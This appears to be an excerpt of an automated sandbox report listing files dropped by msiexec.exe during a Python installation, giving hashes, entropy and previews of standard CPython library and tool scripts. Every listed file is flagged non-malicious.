                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):50923
                                                                                                                                Entropy (8bit):4.780337653403534
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:zBE5XrEKPEKwu42kQOLkf/TL7wCkJY37QVvY1O:NEdEKPRwuCQOL4/TL7wCkJY37Qp0O
                                                                                                                                MD5:D026F4E93043D4DEB81213DA66965F20
                                                                                                                                SHA1:8633EB1A5AF38FDD51BE698ADF761CDED0CB328F
                                                                                                                                SHA-256:0FAEB1645D85AF2CCDBF0BFF1AB7F5579EC1E324E97683AF354A67CF9AA09E90
                                                                                                                                SHA-512:FB4F5A36A9E8B9C40D5AEAD02741F3477EAF18F952B16E5D4B8875A8D9816CED8C1DC8A742711FDA8353AAAA76F08CB12171384CE20E7FBC9A88864584F151D9
                                                                                                                                Malicious:false
                                                                                                                                Preview:#..# XML-RPC CLIENT LIBRARY..# $Id$..#..# an XML-RPC client interface for Python...#..# the marshalling and response parser code can also be used to..# implement XML-RPC servers...#..# Notes:..# this version is designed to work with Python 2.1 or newer...#..# History:..# 1999-01-14 fl Created..# 1999-01-15 fl Changed dateTime to use localtime..# 1999-01-16 fl Added Binary/base64 element, default to RPC2 service..# 1999-01-19 fl Fixed array data element (from Skip Montanaro)..# 1999-01-21 fl Fixed dateTime constructor, etc...# 1999-02-02 fl Added fault handling, handle empty sequences, etc...# 1999-02-10 fl Fixed problem with empty responses (from Skip Montanaro)..# 1999-06-20 fl Speed improvements, pluggable parsers/transports (0.9.8)..# 2000-11-28 fl Changed boolean to check the truth value of its argument..# 2001-02-24 fl Added encoding/Unicode/SafeTransport patches..# 2001-02-26 fl Added compare support to wrappers (0.9.9/1.0b1)..# 2001-03-28 fl Make sure response tuple
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):37871
                                                                                                                                Entropy (8bit):4.553553064216206
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:D2+/Ks9MWfQowYQnRyVRWpAm5JEe8tXSX6cyXB0I:D2jMxXbWLObCI
                                                                                                                                MD5:101E5878B9C1155D703842359F874127
                                                                                                                                SHA1:7070A6D71D513ACD45C34030E4E0437FED25985C
                                                                                                                                SHA-256:4F7153B21432F3EC8923927EA8D07835AC1B566176D1434EAA810E0A58C6B871
                                                                                                                                SHA-512:858E280B41FFA42F30B29A0D84183938E1FBBFD984A9FA8DB4B0788C0BCB9ED3258029DEC8C0F57E260CDE6DD231CC56DA0DE6566B1A4264F1F98E72E96B1B35
                                                                                                                                Malicious:false
                                                                                                                                Preview:r"""XML-RPC Servers.....This module can be used to create simple XML-RPC servers..by creating a server and either installing functions, a..class instance, or by extending the SimpleXMLRPCServer..class.....It can also be used to handle XML-RPC requests in a CGI..environment using CGIXMLRPCRequestHandler.....The Doc* classes can be used to create XML-RPC servers that..serve pydoc-style documentation in response to HTTP..GET requests. This documentation is dynamically generated..based on the functions and methods registered with the..server.....A list of possible usage patterns follows:....1. Install functions:....server = SimpleXMLRPCServer(("localhost", 8000))..server.register_function(pow)..server.register_function(lambda x,y: x+y, 'add')..server.serve_forever()....2. Install an instance:....class MyFuncs:.. def __init__(self):.. # make all of the sys functions available through sys.func_name.. import sys.. self.sys = sys.. def _listMethods(self):.. #
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Nim source code, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7741
                                                                                                                                Entropy (8bit):4.6850395961561775
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:ocnKpf1Jnkgp9Gw06hznakQ+czXoC/KkWb2z7rKUK4mSaY9wRnKwfRuPKJaR0:ocR6VncLoC/Kk22z7P5Z0RFfO0
                                                                                                                                MD5:A981793A5C496164DFB5AFC8212CCABE
                                                                                                                                SHA1:D4309C07CFE248A9725290922937F21363550AE4
                                                                                                                                SHA-256:EF6D063E7337F6D83FBBB4CA3ADAF321B35CBB3AF736A25D2D637231346E3117
                                                                                                                                SHA-512:010D2A3AC76A022165E4564CF9A26A3B3324E8585CCCA1C66EE173A4C6A105993FA55B93576B0C48B271C182AC9CE87BD3CE7441CD76E2B19DE0C1907147379D
                                                                                                                                Malicious:false
                                                                                                                                Preview:import contextlib..import os..import pathlib..import shutil..import stat..import sys..import zipfile....__all__ = ['ZipAppError', 'create_archive', 'get_interpreter']......# The __main__.py used if the users specifies "-m module:fn"...# Note that this will always be written as UTF-8 (module and..# function names can be non-ASCII in Python 3)...# We add a coding cookie even though UTF-8 is the default in Python 3..# because the resulting archive may be intended to be run under Python 2...MAIN_TEMPLATE = """\..# -*- coding: utf-8 -*-..import {module}..{module}.{fn}().."""......# The Windows launcher defaults to UTF-8 when parsing shebang lines if the..# file has no BOM. So use UTF-8 on Windows...# On Unix, use the filesystem encoding...if sys.platform.startswith('win'):.. shebang_encoding = 'utf-8'..else:.. shebang_encoding = sys.getfilesystemencoding()......class ZipAppError(ValueError):.. pass......@contextlib.contextmanager..def _maybe_open(archive, mode):.. if isinstance(
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):94562
                                                                                                                                Entropy (8bit):4.562531473999535
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:A6wB2cRrpt0+IKOU+Onz5HACrx+ns+No2Ba0dVY:A6W2+IbU+Onz5gCrYnpVY
                                                                                                                                MD5:11BA8DCCBFA808E2D2E5DC094EC2E827
                                                                                                                                SHA1:B3B4A71275C3D3721F72E7D782A7551BB60FF0F8
                                                                                                                                SHA-256:7D49B9C076E4F7F59FBC39B2E8B66F1CB6D871D3C5A722AC04A2AC44C0A060E4
                                                                                                                                SHA-512:8C8222F5DB228C8E0697FD6B6B0B8F97AC516990D0308B23236D4E0E6849BA7E6936B9F58927111C937F150B7C41CF49D63200CBA3B5DDC077C70DAB498E52BB
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Read and write ZIP files.....XXX references to utf-8 need further investigation..."""..import binascii..import importlib.util..import io..import itertools..import os..import posixpath..import shutil..import stat..import struct..import sys..import threading..import time..import contextlib..import pathlib....try:.. import zlib # We may need its compression method.. crc32 = zlib.crc32..except ImportError:.. zlib = None.. crc32 = binascii.crc32....try:.. import bz2 # We may need its compression method..except ImportError:.. bz2 = None....try:.. import lzma # We may need its compression method..except ImportError:.. lzma = None....__all__ = ["BadZipFile", "BadZipfile", "error",.. "ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA",.. "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile",.. "Path"]....class BadZipFile(Exception):.. pass......class LargeZipFile(Exception):.. """.. Raised when writing a zipfile, th
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):30918
                                                                                                                                Entropy (8bit):4.679149591713383
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:lO/4t/ka5N9a5LL5pEveF+Si6s/Ag0k6BX8BpL:lOe/XugeHi6GAg04
                                                                                                                                MD5:82F651C0269EA4B2A49E160EF413D925
                                                                                                                                SHA1:C98EB6B309A39EA672F53BFB9C7E89C55052C6FB
                                                                                                                                SHA-256:5B688A52FE200E6FFAF64CD05DBFA03C8BF138A0928FD413BE44EBB89D7188C4
                                                                                                                                SHA-512:C8F8C013166BF23DB376518EF79EA6E8EEB9D3B7EEFEE3266AEA7F8BC9B0996DBBA031C8ADCDDEE4267FAF729128474BA28CECF7EB848E2E62455D77B37DAF90
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""zipimport provides support for importing Python modules from Zip archives.....This module exports three objects:..- zipimporter: a class; its constructor takes a path to a Zip archive...- ZipImportError: exception raised by zipimporter objects. It's a.. subclass of ImportError, so it can be caught as ImportError, too...- _zip_directory_cache: a dict, mapping archive paths to zip directory.. info dicts, as used in zipimporter._files.....It is usually not needed to use the zipimport module explicitly; it is..used by the builtin import mechanism for sys.path items that are paths..to Zip archives..."""....#from importlib import _bootstrap_external..#from importlib import _bootstrap # for _verbose_message..import _frozen_importlib_external as _bootstrap_external..from _frozen_importlib_external import _unpack_uint16, _unpack_uint32..import _frozen_importlib as _bootstrap # for _verbose_message..import _imp # for check_hash_based_pycs..import _io # for open..import marshal # for lo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):734
                                                                                                                                Entropy (8bit):4.864665220724518
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:UonqsiujI35m1qokLaZeGJNi/s8mlB/sDYRSw8B/sDQuWuS5s58vrMsRrcyhfFRS:hqsu9ooEfJN61UNIyivrMshxLUTc2rEY
                                                                                                                                MD5:1F329A76BDAFACD64BB18C75EA2A8328
                                                                                                                                SHA1:1861E23C2508E928FC67DE4147FA52E2D6D1A23D
                                                                                                                                SHA-256:75F4740A1DA3CFB5B3E09C537119058B4A8B1BA7A9B90FB90FCA15527C61E585
                                                                                                                                SHA-512:BD1DB821E7F73636306ECB2222EF6015CE770530301B66864160C3A2D5D887A665AA73B0A9C6BF6867D7C53503686D7ADBEF704E5B552E34FAD8565F70B329BD
                                                                                                                                Malicious:false
                                                                                                                                Preview:__all__ = [.. "ZoneInfo",.. "reset_tzpath",.. "available_timezones",.. "TZPATH",.. "ZoneInfoNotFoundError",.. "InvalidTZPathWarning",..]....from . import _tzpath..from ._common import ZoneInfoNotFoundError....try:.. from _zoneinfo import ZoneInfo..except ImportError: # pragma: nocover.. from ._zoneinfo import ZoneInfo....reset_tzpath = _tzpath.reset_tzpath..available_timezones = _tzpath.available_timezones..InvalidTZPathWarning = _tzpath.InvalidTZPathWarning......def __getattr__(name):.. if name == "TZPATH":.. return _tzpath.TZPATH.. else:.. raise AttributeError(f"module {__name__!r} has no attribute {name!r}")......def __dir__():.. return sorted(list(globals()) + ["TZPATH"])..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5458
                                                                                                                                Entropy (8bit):4.56576710237138
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:pZtg6t5djBau/VbU3U134kEC4e0zGm7ZCdpFXHP3fK+9ZH9iJS:Ht/71Vwk1ok2e0Cm7ZKFXHPPBBiJS
                                                                                                                                MD5:33E429CDD8759CCBEB27B465C8732D99
                                                                                                                                SHA1:494F4D4D0BD4E37DB1324814D1EB09016C3DC5B6
                                                                                                                                SHA-256:D1A50C19EB0DDA4996706CF5180C287303EA98E9DA93B1D9140A71BC8DCBA6C5
                                                                                                                                SHA-512:FEEDAF0753C7868DC005ABD0D67C8500C49967FE133360B41BA0C907DB6503ABFA93FF52500225A9F83D3DFBD8D26D7A7F98B545654F313860B96DFE462BB80D
                                                                                                                                Malicious:false
                                                                                                                                Preview:import struct......def load_tzdata(key):.. from importlib import resources.... components = key.split("/").. package_name = ".".join(["tzdata.zoneinfo"] + components[:-1]).. resource_name = components[-1].... try:.. return resources.files(package_name).joinpath(resource_name).open("rb").. except (ImportError, FileNotFoundError, UnicodeEncodeError):.. # There are three types of exception that can be raised that all amount.. # to "we cannot find this key":.. #.. # ImportError: If package_name doesn't exist (e.g. if tzdata is not.. # installed, or if there's an error in the folder name like.. # Amrica/New_York).. # FileNotFoundError: If resource_name doesn't exist in the package.. # (e.g. Europe/Krasnoy).. # UnicodeEncodeError: If package_name or resource_name are not UTF-8,.. # such as keys containing a surrogate character... raise ZoneInfoNotFoundError(f"No time zone found with
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5271
                                                                                                                                Entropy (8bit):4.48749634206275
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:A89U6VvANreXeUgc/jcF0TQHZ6JWGm85ysIHwtMml90d:AEQeXmc/IFMY4u85ysI8l90d
                                                                                                                                MD5:F1D227D82B64B5041AAD66B8DD1EA639
                                                                                                                                SHA1:97B3D4ED7359F0590DBD509AA072FA682D134DC5
                                                                                                                                SHA-256:526DD1194D42855159F2006C96864EDE10066ACFD3B955F5B1EBEA03D0C4F4D6
                                                                                                                                SHA-512:CE7992733B87FD8A0C49FC48C4724A0F552FB57502715B8A44D516191A954AD84668700FD592A1420CD542379AC6C29EF2A642C1F92CBEA0752D8A014AC8F39A
                                                                                                                                Malicious:false
                                                                                                                                Preview:import os..import sysconfig......def reset_tzpath(to=None):.. global TZPATH.... tzpaths = to.. if tzpaths is not None:.. if isinstance(tzpaths, (str, bytes)):.. raise TypeError(.. f"tzpaths must be a list or tuple, ".. + f"not {type(tzpaths)}: {tzpaths!r}".. ).... if not all(map(os.path.isabs, tzpaths)):.. raise ValueError(_get_invalid_paths_message(tzpaths)).. base_tzpath = tzpaths.. else:.. env_var = os.environ.get("PYTHONTZPATH", None).. if env_var is not None:.. base_tzpath = _parse_python_tzpath(env_var).. else:.. base_tzpath = _parse_python_tzpath(.. sysconfig.get_config_var("TZPATH").. ).... TZPATH = tuple(base_tzpath)......def _parse_python_tzpath(env_var):.. if not env_var:.. return ().... raw_tzpath = env_var.split(os.pathsep).. new_tzpath = tuple(filter(os.path.isabs, raw_tzpath)).... # If a
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25070
                                                                                                                                Entropy (8bit):4.482371365310058
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:hpUadgV7OuqGFNS+kQwDwIRSNMycMlE6vCVXB7ui:hy+4ixGFPkcIRSNMycEW
                                                                                                                                MD5:1F472AA11C1CF9FC9EF1630FDCFDB26D
                                                                                                                                SHA1:938022CBF7792E69AB650BEBED5AFEFC4ACFFE11
                                                                                                                                SHA-256:D05A484CD267DF61A99FE43A7A965249072F81FA06B1E4EACE6D33AFB440D5D0
                                                                                                                                SHA-512:53DCE39A803EC805133B46C4F42D547B56CFD69CFA74CB29CB1CB0F3E62DF04F5E495D5C11713536672E9F6744FEDDA128BAE68A3E1E02EC57C52B4D39FCDBD3
                                                                                                                                Malicious:false
                                                                                                                                Preview:import bisect..import calendar..import collections..import functools..import re..import weakref..from datetime import datetime, timedelta, tzinfo....from . import _common, _tzpath....EPOCH = datetime(1970, 1, 1)..EPOCHORDINAL = datetime(1970, 1, 1).toordinal()....# It is relatively expensive to construct new timedelta objects, and in most..# cases we're looking at the same deltas, like integer numbers of hours, etc...# To improve speed and memory use, we'll keep a dictionary with references..# to the ones we've already used so far...#..# Loading every time zone in the 2020a version of the time zone database..# requires 447 timedeltas, which requires approximately the amount of space..# that ZoneInfo("America/New_York") with 236 transitions takes up, so we will..# set the cache size to 512 so that in the common case we always get cache..# hits, but specifically crafted ZoneInfo objects don't leak arbitrary amounts..# of memory...@functools.lru_cache(maxsize=512)..def _load_timedelta(sec
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3059
                                                                                                                                Entropy (8bit):4.552380605401876
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:Drt8ohr0Z/VyRV/HvXxHRybmwPkQaIFBSVomBVO/kXztmHceQ7oMLd7Qar3ABSDX:Drt/hrqy/PzojceFMVoU4/BHg7rpsa7h
                                                                                                                                MD5:5AB440BD0FE219899BAAAED12775581C
                                                                                                                                SHA1:E8AA17F7E66A3A31993670DCBFDBA17C5CE265BF
                                                                                                                                SHA-256:54F1AB412EC95DCDA481FADF9ADA9A89B51FF18704146285370D547880702CEF
                                                                                                                                SHA-512:401979C076547E325FD82BA535B25AFDEFF213673520294C87AED5D6DEDDD08352CCABA1FEDF78AB8FB4F15D7A4A94197873C76AA84C34EE45593536787D62D4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3...."""List all those Python files that require a coding directive....Usage: findnocoding.py dir1 [dir2...].."""....__author__ = "Oleg Broytmann, Georg Brandl"....import sys, os, re, getopt....# our pysource module finds Python source files..try:.. import pysource..except ImportError:.. # emulate the module with a simple os.walk.. class pysource:.. has_python_ext = looks_like_python = can_be_compiled = None.. def walk_python_files(self, paths, *args, **kwargs):.. for path in paths:.. if os.path.isfile(path):.. yield path.endswith(".py").. elif os.path.isdir(path):.. for root, dirs, files in os.walk(path):.. for filename in files:.. if filename.endswith(".py"):.. yield os.path.join(root, filename).. pysource = pysource()...... print("The pysource module is not available; "..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10481
                                                                                                                                Entropy (8bit):4.5173550936042455
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Q5WPgIy8UGbNS/bbh/qSbWAx08IgvkG2SFKQZd4JE3k5PdF2Hd4aFTrFWGFLFeFt:Q5WoIHUB/bbhyjlgv92SFKLE3oPdcHdM
                                                                                                                                MD5:54D94B76CBC2834EA8A989690AED9915
                                                                                                                                SHA1:FF4BB71796714EEF8CCD1F2C9FB3EA1EAED897F9
                                                                                                                                SHA-256:8523604115B767A6FE8D611A2FFE7BE1FDB52A20AE5A2E8B528387BC5342A16A
                                                                                                                                SHA-512:EE88B5D4B73421B464A96EDD8A8AC99A5F4919C9224D859CA48AF6AF041DF994D9B4B03BA47CEA31E1CFD8A63C824AD1A3762C0E62EE1A105231CD00D178EC1C
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Perform massive identifier substitution on C source files...# This actually tokenizes the files (to some extent) so it can..# avoid making substitutions inside strings or comments...# Inside strings, substitutions are never made; inside comments,..# it is a user option (off by default)...#..# The substitutions are read from one or more files whose lines,..# when not empty, after stripping comments starting with #,..# must contain exactly two words separated by whitespace: the..# old identifier and its replacement...#..# The option -r reverses the sense of the substitutions (this may be..# useful to undo a particular substitution)...#..# If the old identifier is prefixed with a '*' (with no intervening..# whitespace), then it will not be substituted inside comments...#..# Command line arguments are files or directories to be processed...# Directories are searched recursively for files whose name looks..# like a C file (ends in .h or .c). The special filenam
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14619
                                                                                                                                Entropy (8bit):4.3663662266427945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:07cLmnpotMxLLIsBrXJQTceW5slIZ+pF+n7W0msPpXKcm7EzmKRcud1p66HE:07cmnpo+h0sBDaT0jAkisOGmKCk1cx
                                                                                                                                MD5:5048DF3191F0B7DEEEB8A3F4C18F77F9
                                                                                                                                SHA1:1C1A2036B9BE1F5DA50A5D097B11EADA66307733
                                                                                                                                SHA-256:6CCEF8F64A4C90E18E4324108CA1ABD2D2A55AF3D8F0583B0B6462FE37D2B66B
                                                                                                                                SHA-512:74C110084171F42283374DDC4A02C306287DD95B17B53FD8AABC7121FD13FF7A4F10FFB70DCDCB79266822E6F0D66AA4BE3589B721303E054A69DFBE3C19DC0B
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""fixdiv - tool to fix division operators.....To use this tool, first run `python -Qwarnall yourscript.py 2>warnings'...This runs the script `yourscript.py' while writing warning messages..about all uses of the classic division operator to the file..`warnings'. The warnings look like this:.... <file>:<line>: DeprecationWarning: classic <type> division....The warnings are written to stderr, so you must use `2>' for the I/O..redirect. I know of no way to redirect stderr on Windows in a DOS..box, so you will have to modify the script to set sys.stderr to some..kind of log file if you want to do this on Windows.....The warnings are not limited to the script; modules imported by the..script may also trigger warnings. In fact a useful technique is to..write a test script specifically intended to exercise all code in a..particular module or set of modules.....Then run `python fixdiv.py warnings'. This first reads the warnings,..looking for classic division war
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1408
                                                                                                                                Entropy (8bit):4.470342658538391
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yXl+QHtBGkHHYZG3u5yJWaDTHNJH+YZG/5guZDYiXVDVB3jsjCMhjFOmTCMejFOq:bKtBGhGfLtxGJBYiXN7wmtTadaN
                                                                                                                                MD5:D2E14FD8CFCBB3571C86120136EBB14B
                                                                                                                                SHA1:D72FB5F232EE8A045CF7658AADF5634440F9A63E
                                                                                                                                SHA-256:EB44E716E76146E5DC479696F8E7E643AD5E5EE6FE1218455D8E870877F13526
                                                                                                                                SHA-512:47CDC121D1650217F7AEB2AEE94C71E7256EEA0CEEACBEA652F692503F814FCC3EF4D1353ECA921D44EF1708686E32935A5D84D75DA66FED0AF37EB88752BA05
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3....# Add some standard cpp magic to a header file....import sys....def main():.. args = sys.argv[1:].. for filename in args:.. process(filename)....def process(filename):.. try:.. f = open(filename, 'r').. except IOError as msg:.. sys.stderr.write('%s: can\'t open: %s\n' % (filename, str(msg))).. return.. with f:.. data = f.read().. if data[:2] != '/*':.. sys.stderr.write('%s does not begin with C comment\n' % filename).. return.. try:.. f = open(filename, 'w').. except IOError as msg:.. sys.stderr.write('%s: can\'t write: %s\n' % (filename, str(msg))).. return.. with f:.. sys.stderr.write('Processing %s ...\n' % filename).. magic = 'Py_'.. for c in filename:.. if ord(c)<=0x80 and c.isalnum():.. magic = magic + c.upper().. else: magic = magic + '_'.. print('#ifndef', magic, file=f).. print('#defi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3138
                                                                                                                                Entropy (8bit):4.794731358075194
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MqcDNkcl9i6s9iXw9sQhZCZwdfAIDypBAUucRCBSWLd4J0ld5d6QeaN:MFNFi6QiXvTaYIKyUuYCjyM5K0
                                                                                                                                MD5:A5113B0A40BE960C3013E22B3A1DBEAE
                                                                                                                                SHA1:A05EFA48AED60FB56A9DC0AAA841CA00DB614D1B
                                                                                                                                SHA-256:C29CBB5BED495B74857CF536962887A155EC9DBE4B7B4336EF0560D10567ED87
                                                                                                                                SHA-512:BA0E17213F2F3450017C5A442955CBB1568A90D03D12A5058D8E2405741A373C7F1A19093C02D59FCC039A42A04C73D59D1EA93B933719CF3D885DD56E704D06
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""(Ostensibly) fix copyright notices in files.....Actually, this script will simply replace a block of text in a file from one..string to another. It will only do this once though, i.e. not globally..throughout the file. It writes a backup file and then does an os.rename()..dance for atomicity.....Usage: fixnotices.py [options] [filenames]..Options:.. -h / --help.. Print this message and exit.... --oldnotice=file.. Use the notice in the file as the old (to be replaced) string, instead.. of the hard coded value in the script..... --newnotice=file.. Use the notice in the file as the new (replacement) string, instead of.. the hard coded value in the script..... --dry-run.. Don't actually make the changes, but print out the list of files that.. would change. When used with -v, a status will be printed for every.. file..... -v / --verbose.. Print a message for every file looked at, i
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):923
                                                                                                                                Entropy (8bit):4.3372833914322415
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:HwXop1sYFMcE5641Q+nWMoxf6nONRlQB5RBVWyULlPshRyphSrxDsYBpR3MNRwMU:QXopuP5RnJHnHbW9xjhuCQT3N4paN
                                                                                                                                MD5:8111CE3E8DFF8372B8A05F13A6AA106D
                                                                                                                                SHA1:B1CCB4DE9ADA6395467DCE268DE15F06871A4656
                                                                                                                                SHA-256:4BB7001C51C5E679D036B3825A765F6DFE136DB5FCB7D0595BB4DD9F4A54A5FA
                                                                                                                                SHA-512:F9F216D2CC63D03DBAE5E38176E7774CC472D1D99ABD75E300F917B200A2CF16FA925034E3187F08DCD3E532BF14C7620B5C68D95B18F5D13EF429F4FCD203E1
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3....# Fix Python script(s) to reference the interpreter via /usr/bin/env python...# Warning: this overwrites the file without making a backup.....import sys..import re......def main():.. for filename in sys.argv[1:]:.. try:.. f = open(filename, 'r').. except IOError as msg:.. print(filename, ': can\'t open :', msg).. continue.. with f:.. line = f.readline().. if not re.match('^#! */usr/local/bin/python', line):.. print(filename, ': not a /usr/local/bin/python script').. continue.. rest = f.read().. line = re.sub('/usr/local/bin/python',.. '/usr/bin/env python', line).. print(filename, ':', repr(line)).. with open(filename, "w") as f:.. f.write(line).. f.write(rest)....if __name__ == '__main__':.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25016
                                                                                                                                Entropy (8bit):4.723577623759691
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:FBG+AoQshh4QAyagb8HGjouxYftfWXQtjtetztjI:FQ+Aahh4QAyw04ZxQN6
                                                                                                                                MD5:E5167E2A20318BA9D2611916F24B72AE
                                                                                                                                SHA1:0DA519783D7DF226FC368B866532FD57AFB01972
                                                                                                                                SHA-256:422E14E076631E673F4788980F97C3DCBEA3CA66AC3BB616FC35BBBC97800349
                                                                                                                                SHA-512:F98E288D86D3ADAD89030029F36A922C8A11FC1BFF75E77702A1BB3637F74064BA82E4CA6ED73DBE3071F20F0AA659EE2DE57A76442C351530EBCFB9E1FD410F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Freeze modules and regen related files (e.g. Python/frozen.c).....See the notes at the top of Python/frozen.c for more info..."""....from collections import namedtuple..import hashlib..import os..import ntpath..import posixpath..import sys..import argparse..from update_file import updating_file_with_tmpfile......ROOT_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))..ROOT_DIR = os.path.abspath(ROOT_DIR)..FROZEN_ONLY = os.path.join(ROOT_DIR, 'Tools', 'freeze', 'flag.py')....STDLIB_DIR = os.path.join(ROOT_DIR, 'Lib')..# If FROZEN_MODULES_DIR or DEEPFROZEN_MODULES_DIR is changed then the..# .gitattributes and .gitignore files needs to be updated...FROZEN_MODULES_DIR = os.path.join(ROOT_DIR, 'Python', 'frozen_modules')..DEEPFROZEN_MODULES_DIR = os.path.join(ROOT_DIR, 'Python', 'deepfreeze')....FROZEN_FILE = os.path.join(ROOT_DIR, 'Python', 'frozen.c')..MAKEFILE = os.path.join(ROOT_DIR, 'Makefile.pre.in')..PCBUILD_PROJECT = os.path.join(ROOT_DIR, 'PCbuild', '_freeze_modul
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10358
                                                                                                                                Entropy (8bit):4.66587602932551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TyRLC3JQU/zw0YLWxTRTkqHRTkv66CCEYFW:T9zYLWxTRTzHRTF6CQW
                                                                                                                                MD5:310C8837ADDCBA4BA39EA080BA74D9A9
                                                                                                                                SHA1:B815293CCF88DB0201C29385469C54C3EB176141
                                                                                                                                SHA-256:407B01D9DAC46418843F9F3B83BDA132EF5FB8FE62B554924EE64FEC484B9884
                                                                                                                                SHA-512:654B83814726C0697B13EEE8AA92E6E59C00772D5A90ADFBC7BFFF7C83D3949CB0A54DC8F27AEEBAEBFB55769C1C8E85F57EC9E4BED6A048347F9490474B628F
                                                                                                                                Malicious:false
                                                                                                                                Preview:import contextlib..import io..import os.path..import re....__file__ = os.path.abspath(__file__)..ROOT = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))..INTERNAL = os.path.join(ROOT, 'Include', 'internal')......IGNORED = {.. 'ACTION', # Python/_warnings.c.. 'ATTR', # Python/_warnings.c and Objects/funcobject.c.. 'DUNDER', # Objects/typeobject.c.. 'RDUNDER', # Objects/typeobject.c.. 'SPECIAL', # Objects/weakrefobject.c..}..IDENTIFIERS = [.. # from ADD() Python/_warnings.c.. 'default',.. 'ignore',.... # from GET_WARNINGS_ATTR() in Python/_warnings.c.. 'WarningMessage',.. '_showwarnmsg',.. '_warn_unawaited_coroutine',.. 'defaultaction',.. 'filters',.. 'onceregistry',.... # from WRAP_METHOD() in Objects/weakrefobject.c.. '__bytes__',.. '__reversed__',.... # from COPY_ATTR() in Objects/funcobject.c.. '__module__',.. '__name__',.. '__qualname__',.. '__doc__',.. '__annotations__',.... # from SLOT* in O
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5307
                                                                                                                                Entropy (8bit):5.062190595071199
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:KkUyYRzx+G16/IDR5RSUK1cZNCKkb/Cmhv3shHH3JoHApO9QvEaa5Z:Kn/cw6eZNC3b/CUv3sd3JoHApOWvEaaf
